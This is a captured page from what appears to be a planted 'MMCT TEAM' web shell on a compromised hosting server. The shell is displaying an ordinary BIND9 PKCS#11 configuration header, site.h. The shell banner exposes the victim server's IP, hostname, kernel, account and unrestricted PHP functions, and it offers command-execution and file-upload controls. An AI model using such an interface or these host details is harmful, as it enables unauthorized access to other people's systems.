MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.116.12.7
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /lib/../include/bind9/pk11/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : //lib/../include/bind9/pk11/site.h
/*
 * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
 *
 * This Source Code Form is subject to the terms of the Mozilla Public
 * License, v. 2.0. If a copy of the MPL was not distributed with this
 * file, You can obtain one at http://mozilla.org/MPL/2.0/.
 *
 * See the COPYRIGHT file distributed with this work for additional
 * information regarding copyright ownership.
 */

/* The documentation about this file is in README.site */

#ifndef PK11_SITE_H
#define PK11_SITE_H 1

/*! \file pk11/site.h */

/*\brief Put here specific PKCS#11 tweaks
 *
 *\li PK11_<mechanism>_SKIP:
 *	Don't consider the lack of this mechanism as a fatal error.
 *
 *\li PK11_<mechanism>_REPLACE:
 *      Same as SKIP, and implement the mechanism using lower-level steps.
 *
 *\li PK11_<algorithm>_DISABLE:
 *	Same as SKIP, and disable support for the algorithm.
 *
 *\li PK11_PAD_HMAC_KEYS:
 *	Extend HMAC keys shorter than digest length.
 */

/* current implemented flags are:
PK11_DH_PKCS_PARAMETER_GEN_SKIP
PK11_DSA_PARAMETER_GEN_SKIP
PK11_RSA_PKCS_REPLACE
PK11_MD5_HMAC_REPLACE
PK11_SHA_1_HMAC_REPLACE
PK11_SHA224_HMAC_REPLACE
PK11_SHA256_HMAC_REPLACE
PK11_SHA384_HMAC_REPLACE
PK11_SHA512_HMAC_REPLACE
PK11_MD5_DISABLE
PK11_DSA_DISABLE
PK11_DH_DISABLE
PK11_PAD_HMAC_KEYS
*/

/*
 * Predefined flavors
 */
/* Thales nCipher */
#define PK11_THALES_FLAVOR 0
/* SoftHSMv1 with SHA224 */
#define PK11_SOFTHSMV1_FLAVOR 1
/* SoftHSMv2 */
#define PK11_SOFTHSMV2_FLAVOR 2
/* Cryptech */
#define PK11_CRYPTECH_FLAVOR 3
/* AEP Keyper */
#define PK11_AEP_FLAVOR 4

/* Default is for Thales nCipher */
#ifndef PK11_FLAVOR
#define PK11_FLAVOR PK11_THALES_FLAVOR
#endif

#if PK11_FLAVOR == PK11_THALES_FLAVOR
#define PK11_DH_PKCS_PARAMETER_GEN_SKIP
/* doesn't work but supported #define PK11_DSA_PARAMETER_GEN_SKIP */
#define PK11_MD5_HMAC_REPLACE
#endif

#if PK11_FLAVOR == PK11_SOFTHSMV1_FLAVOR
#define PK11_PAD_HMAC_KEYS
#endif

#if PK11_FLAVOR == PK11_SOFTHSMV2_FLAVOR
/* SoftHSMv2 was updated to enforce minimal key sizes... argh! */
#define PK11_MD5_HMAC_REPLACE
#define PK11_SHA_1_HMAC_REPLACE
#define PK11_SHA224_HMAC_REPLACE
#define PK11_SHA256_HMAC_REPLACE
#define PK11_SHA384_HMAC_REPLACE
#define PK11_SHA512_HMAC_REPLACE
#endif

#if PK11_FLAVOR == PK11_CRYPTECH_FLAVOR
#define PK11_DH_DISABLE
#define PK11_DSA_DISABLE
#define PK11_MD5_DISABLE
#define PK11_SHA_1_HMAC_REPLACE
#define PK11_SHA224_HMAC_REPLACE
#define PK11_SHA256_HMAC_REPLACE
#define PK11_SHA384_HMAC_REPLACE
#define PK11_SHA512_HMAC_REPLACE
#endif

#if PK11_FLAVOR == PK11_AEP_FLAVOR
#define PK11_DH_DISABLE
#define PK11_DSA_DISABLE
#define PK11_RSA_PKCS_REPLACE
#define PK11_MD5_HMAC_REPLACE
#define PK11_SHA_1_HMAC_REPLACE
#define PK11_SHA224_HMAC_REPLACE
#define PK11_SHA256_HMAC_REPLACE
#define PK11_SHA384_HMAC_REPLACE
#define PK11_SHA512_HMAC_REPLACE
#endif

#endif /* PK11_SITE_H */

MMCT - 2023